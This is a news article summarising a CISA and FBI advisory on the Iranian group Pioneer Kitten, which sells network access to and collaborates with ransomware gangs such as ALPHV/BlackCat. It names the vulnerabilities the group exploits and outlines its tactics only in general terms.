Hackers sponsored by the Iranian government are acting as go-betweens and initial access brokers to target environments on behalf of financially motivated ransomware gangs, including big names such as ALPHV/BlackCat, the US Cybersecurity and Infrastructure Security Agency (CISA) has warned.
In an advisory published this week, CISA and its law enforcement partners, including the FBI, revealed that the Iranian advanced persistent threat (APT) group tracked variously as Pioneer Kitten, UNC757, Parisite, Rubidium and Lemon Sandstorm has been conducting malicious cyber operations aimed at deploying ransomware attacks to obtain, maintain and develop network access.
“These operations aid malicious cyber actors in further collaborating with affiliate actors to continue deploying ransomware,” the CISA said.
“This advisory outlines activity by a specific group of Iranian cyber actors that has conducted a high volume of computer network intrusion attempts against US organisations since 2017 and as recently as August 2024. Compromised organisations include US-based schools, municipal governments, financial institutions and healthcare facilities.”
The FBI had previously observed the group attempting to monetise their access to victim organisations on underground markets, and now assesses that a “significant percentage” of its activity – at least in the US – is focused on selling this access on to Russian-speaking cyber crime gangs.
But there is now evidence that this relationship seems to run even deeper. Indeed, the Feds now believe Pioneer Kitten has been “collaborating directly” with ransomware affiliates to receive a cut of the ransom payments in exchange for their assistance.
“These actors have collaborated with the ransomware affiliates NoEscape, RansomHouse, and ALPHV (aka BlackCat),” said the CISA.
“The Iranian cyber actors’ involvement in these ransomware attacks goes beyond providing access; they work closely with ransomware affiliates to lock victim networks and strategise on approaches to extort victims.
“The FBI assesses these actors do not disclose their Iran-based location to their ransomware affiliate contacts and are intentionally vague as to their nationality and origin.”
Thwarting the Kitten
A Pioneer Kitten-enabled ransomware attack generally seems to begin with the exploitation of remote external services on internet-facing assets.
In recent weeks, the gang has been observed using Shodan to identify IP addresses hosting Check Point Security Gateways vulnerable to CVE-2024-24919, but it is also known to have exploited CVE-2024-3400 in Palo Alto Networks PAN-OS and GlobalProtect VPN, as well as older vulnerabilities in Citrix and F5 BIG-IP. Addressing these issues should be priority number one for security teams in at-risk organisations.
Once beyond this first hurdle, the group’s modus operandi is in most regards a fairly standard one – it seeks to further its goals by capturing login credentials on Netscaler devices via a deployed webshell, elevates its privileges by hijacking or creating new accounts, often with exemptions to zero-trust policies, places backdoors to load malware, and tries to disable antivirus software and lower security settings. It also sets up a daily Windows service task for persistence as mitigation occurs.
When it comes to command and control, Pioneer Kitten is known to use the AnyDesk remote access programme and to enable servers to use Windows PowerShell Web Access. It also favours Ligolo, an open source tunnelling tool, and NGROK to create outbound connections.
The full CISA advisory contains more technical details on its attack chain.
Has Pioneer Kitten gone rogue?
Interestingly, the US authorities also said Pioneer Kitten’s ransomware activities may not be officially sanctioned by Tehran, and the group’s members themselves – who use the Iranian company name Danesh Novin Sahand as a cover IT company – have occasionally expressed concern that the Iranian government may be monitoring their money-laundering activities.
Pioneer Kitten’s official remit, said CISA, appears to be to conduct hack-and-leak campaigns, stealing data and publicising it, not to make money, but to undermine their victims as part of Iranian information operations. This activity seems to have been largely focused on victims in Israel and other regional powers of interest to Iran, including Azerbaijan and the United Arab Emirates.